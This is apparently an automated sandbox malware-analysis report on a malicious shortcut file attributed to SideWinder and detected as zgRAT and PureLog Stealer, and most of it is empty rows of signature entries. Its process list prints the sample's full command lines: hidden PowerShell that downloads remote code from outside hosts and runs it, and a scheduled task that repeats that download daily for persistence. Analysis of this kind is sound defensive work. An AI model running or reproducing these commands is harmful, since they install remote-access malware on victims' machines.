Windows
Analysis Report
BX7yRz7XqF.lnk
Overview
General Information
Sample name: | BX7yRz7XqF.lnkrenamed because original name is a hash value |
Original sample name: | 7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877.lnk |
Analysis ID: | 1522858 |
MD5: | b642cbf2d292b2e92d5038e6dfbd2de7 |
SHA1: | 4f92090113a65f13fa6ad128c7e492984a99d294 |
SHA256: | 7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877 |
Tags: | lnkSideWinderuser-JAMESWT_MHT |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 5140 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLO G -WInDoWS T HIDDe -N oeXI -Nopr OFILE -non iNtErac -C ommaN ping www.nadra .gov.pk; n slookup ww w.yahoo.co m; nslooku p www.prot onmail.com ; start ht tps://pmo. gov.pk/sit e/404; $id ='ftroof.t op/'; &('i '+'r'+'m') http://pm officepaki stanclouds erver.shi$ id/WinSysM gr/|Powers hell MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4100 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 6904 cmdline:
"C:\Window s\system32 \PING.EXE" www.nadra .gov.pk MD5: 2F46799D79D22AC72C241EC0322B011D) - nslookup.exe (PID: 6648 cmdline:
"C:\Window s\system32 \nslookup. exe" www.y ahoo.com MD5: F2E3950C1023ACF80765C918791999C0) - nslookup.exe (PID: 6532 cmdline:
"C:\Window s\system32 \nslookup. exe" www.p rotonmail. com MD5: F2E3950C1023ACF80765C918791999C0) - chrome.exe (PID: 4656 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// pmo.gov.pk /site/404 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 1928 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2212 --fi eld-trial- handle=191 6,i,144452 8209182799 1487,70056 0137903687 9201,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - powershell.exe (PID: 7616 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7848 cmdline:
"C:\Window s\system32 \cmd.exe" /k schtask s /create /sc daily /tn LocalM Cleaner /t r "Powersh ell -Windo wStyle Hid den irm ht tp://ofc.m ofservices erver.top/ DSCTSC/|Po wershell" /st 10:13 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - schtasks.exe (PID: 7864 cmdline:
schtasks / create /sc daily /tn LocalMCle aner /tr " Powershell -WindowSt yle Hidden irm http: //ofc.mofs erviceserv er.top/DSC TSC/|Power shell" /st 10:13 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- svchost.exe (PID: 1536 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 7884 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\Powersh ell.EXE -W indowStyle Hidden ir m http://o fc.mofserv iceserver. top/DSCTSC /|Powershe ll MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7892 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8136 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
| |
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
| |
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
Click to see the 7 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: |
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | LNK file: |
Source: | File created: | Jump to behavior |
Source: | Code function: | 10_2_00007FFAAC486D80 | |
Source: | Code function: | 10_2_00007FFAAC48EDE0 | |
Source: | Code function: | 10_2_00007FFAAC48C93B | |
Source: | Code function: | 10_2_00007FFAAC48CA35 | |
Source: | Code function: | 10_2_00007FFAAC48CA90 |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | LNK file: |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Code function: | 0_2_00007FFAAC4900C1 | |
Source: | Code function: | 10_2_00007FFAAC48785D | |
Source: | Code function: | 10_2_00007FFAAC48786D | |
Source: | Code function: | 10_2_00007FFAAC4800C1 | |
Source: | Code function: | 10_2_00007FFAAC550EDF |
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
